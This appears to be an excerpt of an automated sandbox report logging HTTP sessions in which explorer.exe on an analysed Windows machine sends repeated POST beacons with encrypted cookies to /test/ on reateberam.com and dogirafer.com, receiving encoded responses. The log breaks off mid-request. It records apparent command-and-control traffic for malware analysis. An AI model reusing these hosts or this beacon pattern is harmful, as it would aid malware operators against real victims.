                                                                  2024-12-02 17:46:22 UTC339INData Raw: 31 34 63 0d 0a 4f 53 71 5a 54 4d 47 36 30 59 70 76 59 42 6a 51 68 57 66 6b 67 33 39 4c 4f 45 37 65 41 53 6a 43 62 76 36 37 75 53 66 4a 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 4a 6b 4d 72 65 4a 61 4f 68 31 73 6e 43 37 71 32 73 2b 30 4a 74 5a 75 70 72 63 6b 38 67 69 42 64 46 57 52 45 37 73 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 38 77 32 41 2b 7a 6d 49 58 4d 5a 61 37 4c 43 65 33 4d 6b 71 34 35 41 35 31 58 5a 41 52 77 70 68 6b 45 39 4f 46 34 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 66 64 52 51 35
                                                                  Data Ascii: 14cOSqZTMG60YpvYBjQhWfkg39LOE7eASjCbv67uSfJYGmcphSGpB6yiJiVjA1qJkMreJaOh1snC7q2s+0JtZuprck8giBdFWRE7sXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4G8w2A+zmIXMZa7LCe3Mkq45A51XZARwphkE9OF4BcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPfdRQ5
                                                                  2024-12-02 17:46:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  36192.168.2.550024172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:23 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:24 UTC796INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOc14We%2FuhrDNo8wjgiFwpHw6VTbSTa6c5f9Gnj86H10PcMygnatWHbE5SdkmhZpNAp74Mvv%2BXFuIvytLpnj%2FlSAHI43NBXYR8rRA%2BWhD%2BRnIhxkGxcZhjEm%2BuC8zqd9xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22da2e3e0f6d-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1652&rtt_var=629&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1726788&cwnd=252&unsent_bytes=0&cid=c33c1e272bf8eff0&ts=756&x=0"
                                                                  2024-12-02 17:46:24 UTC343INData Raw: 31 35 30 0d 0a 50 79 75 56 52 73 47 31 32 49 70 76 5a 52 72 66 68 6d 4c 6c 67 33 42 47 4d 30 4c 58 41 53 44 43 62 66 6d 37 74 69 62 49 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 4c 30 55 76 63 35 4c 67 37 46 63 6a 44 62 57 2b 74 4b 56 47 73 70 75 76 72 63 73 36 37 55 35 56 48 47 4e 46 37 4d 53 67 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6f 35 42 75 50 69 4a 52 70 2b 62 37 2f 49 65 58 67 6b 35 4d 74 44 35 31 4c 63 43 6e 5a 50 67 45 30 30 4d 56 38 4e 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 66 64 52 51 70
                                                                  Data Ascii: 150PyuVRsG12IpvZRrfhmLlg3BGM0LXASDCbfm7tibIYGmcphSGpB6yiJiVjA1sL0Uvc5Lg7FcjDbW+tKVGspuvrcs67U5VHGNF7MSgfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kco5BuPiJRp+b7/IeXgk5MtD51LcCnZPgE00MV8NcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPfdRQp
                                                                  2024-12-02 17:46:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  37192.168.2.550025172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:25 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:26 UTC786INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kmSx2RhrFpcEECeZhHYvpRtZBsaPDxSZ52iHJSj6tC4DRV0hiE6lrqerC1OujfcF7NEfP4p7e1FpH5hST2YivffuF%2BfbBcC1Qy1PkvXvCVQ5v2Gphpdr7ffnSCGBdR0YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22e9fc924364-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2257&min_rtt=2255&rtt_var=850&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1283516&cwnd=206&unsent_bytes=0&cid=c9938b283baf6d28&ts=773&x=0"
                                                                  2024-12-02 17:46:26 UTC343INData Raw: 31 35 30 0d 0a 4f 43 75 66 54 63 4b 31 32 49 70 67 5a 78 6a 52 68 32 4c 6a 67 33 4a 48 4f 45 50 53 41 55 36 6f 62 2f 32 30 76 43 4c 4c 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 5a 74 49 30 59 76 66 70 43 4f 67 6c 63 67 44 62 65 37 75 4f 30 49 73 70 4b 75 72 63 41 2f 67 69 52 63 48 6d 46 4b 36 73 66 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 30 7a 42 65 76 6b 49 33 4d 58 62 37 4c 41 63 33 4d 72 71 34 56 48 36 31 72 59 43 52 6f 70 67 45 6b 2f 4d 56 49 4f 4f 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 56 57 52 35
                                                                  Data Ascii: 150OCufTcK12IpgZxjRh2Ljg3JHOEPSAU6ob/20vCLLKRib7xuPoA21j4bUizZtI0YvfpCOglcgDbe7uO0IspKurcA/giRcHmFK6sfsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EM0zBevkI3MXb7LAc3Mrq4VH61rYCRopgEk/MVIOOcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfVWR5
                                                                  2024-12-02 17:46:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  38192.168.2.550026172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:28 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:28 UTC799INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bwhvg7VQUc6B2k4OuuGWxlP7jls%2Fk2XcXyU%2BJFvZGhNWGObrkN1RH6Tl%2BicsXeA316oJSX22PU4Ecd8pbchBP79j%2B1ES%2BFL%2BA8BnM%2BrzaQ4uVkEEv5RrVBPy0yJvaLCwhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22f79f3ea217-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13731&min_rtt=13721&rtt_var=5165&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=211563&cwnd=32&unsent_bytes=0&cid=22e29e94a3e149b1&ts=687&x=0"
                                                                  2024-12-02 17:46:28 UTC335INData Raw: 31 34 38 0d 0a 4f 79 32 56 51 73 43 33 32 59 70 75 5a 42 72 63 68 32 4c 68 67 33 56 4f 50 55 50 58 41 69 58 43 62 76 75 37 75 43 4c 4b 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 4a 45 55 75 66 4a 61 4f 67 46 59 6c 44 72 71 34 73 2b 30 49 74 70 65 6d 70 4b 63 39 36 43 4e 58 48 57 4d 42 30 76 6e 46 55 79 39 7a 57 67 30 44 56 55 33 2b 6f 59 50 48 55 33 32 5a 34 54 6b 4b 4e 4a 6f 4e 39 62 77 77 6d 55 43 32 2b 4c 79 41 56 7a 63 68 36 6e 66 62 47 79 62 4c 45 4d 73 78 61 2b 50 6c 4b 52 6f 55 5a 62 4f 4d 66 48 55 72 34 49 39 50 36 44 33 66 43 52 35 48 67 55 6b 30 66 57 59 79 57 2b 37 38 49 39 65 59 58 57 79 45 50 6e 4b 71 48 79 4b 4a 61 56 51 66 4f 54 44 72 32 41 78 68 42 62 49 66 69 49 36 43 6c 4c 4e 59 61 4b 2f 67 2f 63 33 6e 50 76 56 62 54 76
                                                                  Data Ascii: 148Oy2VQsC32YpuZBrch2Lhg3VOPUPXAiXCbvu7uCLKZGmcphSGpB6yiJiVjA1rJEUufJaOgFYlDrq4s+0ItpempKc96CNXHWMB0vnFUy9zWg0DVU3+oYPHU32Z4TkKNJoN9bwwmUC2+LyAVzch6nfbGybLEMsxa+PlKRoUZbOMfHUr4I9P6D3fCR5HgUk0fWYyW+78I9eYXWyEPnKqHyKJaVQfOTDr2AxhBbIfiI6ClLNYaK/g/c3nPvVbTv
                                                                  2024-12-02 17:46:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  39192.168.2.550027172.67.217.1904431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:30 UTC415OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:31 UTC793INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyeeaOlocEFkIkmn86ClgSWWFJ%2FQ8tq6e6Ulaeg7ZHnzUFxTpOefl%2Fqp9N3QYKA9HNgvqUnWmz2T1wuugn%2FYaElhSYCbyox4ZUY2dD2%2BtpcfihlZlPNYOtwhomNaWgbUyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd23056a6d7114-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14045&min_rtt=14030&rtt_var=5291&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=206360&cwnd=32&unsent_bytes=0&cid=7949f5a9a33db474&ts=716&x=0"
                                                                  2024-12-02 17:46:31 UTC339INData Raw: 31 34 63 0d 0a 4f 53 69 64 52 63 4f 31 33 6f 70 6c 59 68 33 63 67 32 37 67 67 33 42 49 4d 6b 50 56 44 43 48 43 61 50 75 37 74 69 58 4c 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 4a 6b 45 70 66 35 50 6b 37 46 59 6e 41 4c 53 2f 73 4f 30 49 73 35 47 72 6f 63 41 36 67 69 4a 56 47 32 46 50 35 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 48 45 4d 77 77 42 65 6e 69 54 68 55 52 61 62 66 4a 65 58 52 68 34 59 42 45 35 6c 72 65 44 33 5a 46 68 45 73 30 4e 31 38 4e 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 2f 42 57 52 4a
                                                                  Data Ascii: 14cOSidRcO13oplYh3cg27gg3BIMkPVDCHCaPu7tiXLZmmcphSGpB6yiJiVjA1rJkEpf5Pk7FYnALS/sO0Is5GrocA6giJVG2FP5o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzHEMwwBeniThURabfJeXRh4YBE5lreD3ZFhEs0N18NcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZO/BWRJ
                                                                  2024-12-02 17:46:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  40192.168.2.550029104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:33 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:35 UTC790INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:35 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6T7cV66UKhIP2A%2B%2BbCh6ZjJDIAIiJj99OPEdaDMTYrfMPneEg37XX4RX7twrBmr%2BpiWJ7GRFTGyLWegjIuEbEjcfmpNwnFr%2Fc2Elu383Rg%2BNB2swj%2BkBrX4U8J2XRvP"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd231a0fe8ac52-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14114&min_rtt=14113&rtt_var=5296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=206696&cwnd=32&unsent_bytes=0&cid=9e41d15889808328&ts=1606&x=0"
                                                                  2024-12-02 17:46:35 UTC343INData Raw: 31 35 30 0d 0a 4f 43 69 5a 52 38 57 79 32 59 70 6b 5a 42 6a 62 68 47 4c 6a 67 33 46 47 50 6b 76 55 42 53 4c 43 61 50 6d 33 75 69 62 50 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 49 6b 51 76 66 5a 53 4f 67 46 67 6c 44 37 43 34 74 65 30 4e 75 35 4b 6e 70 38 6f 36 67 69 68 57 46 47 46 50 36 73 48 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 47 73 6b 78 42 65 50 71 4b 58 4d 57 5a 62 50 44 66 6e 59 72 71 34 4e 48 35 6c 50 5a 41 42 41 70 67 55 34 37 4e 6c 73 4b 50 4d 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 56 53 52 35
                                                                  Data Ascii: 150OCiZR8Wy2YpkZBjbhGLjg3FGPkvUBSLCaPm3uibPYmmcphSGpB6yiJiVjA1nIkQvfZSOgFglD7C4te0Nu5Knp8o6gihWFGFP6sHsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4GskxBePqKXMWZbPDfnYrq4NH5lPZABApgU47NlsKPMC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfVSR5
                                                                  2024-12-02 17:46:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  41192.168.2.550030104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:36 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:38 UTC783INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3KYhObr9uFrh3c2sxCBf2Gt5KdGG%2BALxtlIc0jcGjkx41TTUMhZ22XU13KEcYNnJUaYipWum4VYFyHA0stakA%2Bn0ajvURsNrFb%2BjoQ1rtFoADzHk9wdrknOgsbVKEiz"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd232c3848efa7-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1805&rtt_var=680&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1605277&cwnd=137&unsent_bytes=0&cid=205daadc4796b238&ts=1640&x=0"
                                                                  2024-12-02 17:46:38 UTC343INData Raw: 31 35 30 0d 0a 4f 79 57 61 52 73 53 36 32 49 70 76 59 68 6a 59 68 57 37 70 67 33 35 4a 50 45 72 51 44 53 6a 43 5a 2f 79 78 76 43 37 46 5a 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 4a 45 59 71 63 35 54 6e 37 46 67 67 41 62 4b 34 75 61 64 47 75 70 61 6d 70 38 38 33 35 45 35 51 48 6d 56 4f 36 63 61 6c 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 45 31 42 65 33 68 4b 52 56 2b 62 62 62 41 65 58 59 73 34 73 74 43 37 56 62 63 44 52 31 41 37 45 45 35 4f 56 73 4a 4f 49 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 51 51 4a
                                                                  Data Ascii: 150OyWaRsS62IpvYhjYhW7pg35JPErQDSjCZ/yxvC7FZWmcphSGpB6yiJiVjA1pJEYqc5Tn7FggAbK4uadGupamp8835E5QHmVO6calfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcE1Be3hKRV+bbbAeXYs4stC7VbcDR1A7EE5OVsJOIzMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1QQJ
                                                                  2024-12-02 17:46:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  42192.168.2.550031104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:39 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:41 UTC789INHTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:41 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWsv%2FLWXirzNUI3XbAGT7%2F7z6lRNVI0ozPHww0Euk6Ah2WLpWH3t9Buw%2BBFKgoJRDVZYQBRPGJvopTCgl9TfA%2By%2B%2B8eVqL43oXKdEToOK2Fkqp8XWwCutAVIm8FT9c20"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd233f4ee90cb8-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1547&rtt_var=581&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=1881443&cwnd=162&unsent_bytes=0&cid=7badd79a26a36872&ts=1660&x=0"
                                                                  2024-12-02 17:46:41 UTC339INData Raw: 31 34 63 0d 0a 50 69 71 62 51 63 47 30 32 6f 70 75 5a 78 6a 52 6a 47 66 69 67 33 64 4a 4f 6b 50 55 41 43 6a 43 62 66 6d 7a 75 43 54 4f 5a 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 72 49 30 59 73 66 70 66 6d 37 46 59 6c 44 37 61 33 73 61 46 47 75 35 47 71 6f 73 34 34 35 45 35 56 47 57 42 4b 36 4d 71 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 30 79 44 65 76 69 49 68 35 2b 5a 62 37 4a 65 58 6b 72 35 38 74 42 35 6c 54 55 44 42 68 43 37 45 30 37 4e 31 4d 4e 50 34 2f 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 58 51 5a
                                                                  Data Ascii: 14cPiqbQcG02opuZxjRjGfig3dJOkPUACjCbfmzuCTOZmmcphSGpB6yiJiVjA1rI0Ysfpfm7FYlD7a3saFGu5Gqos445E5VGWBK6MqifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc0yDeviIh5+Zb7JeXkr58tB5lTUDBhC7E07N1MNP4/MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1XQZ
                                                                  2024-12-02 17:46:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  43192.168.2.550032104.21.68.894431028C:\Windows\explorer.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-02 17:46:42 UTC414OUTPOST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
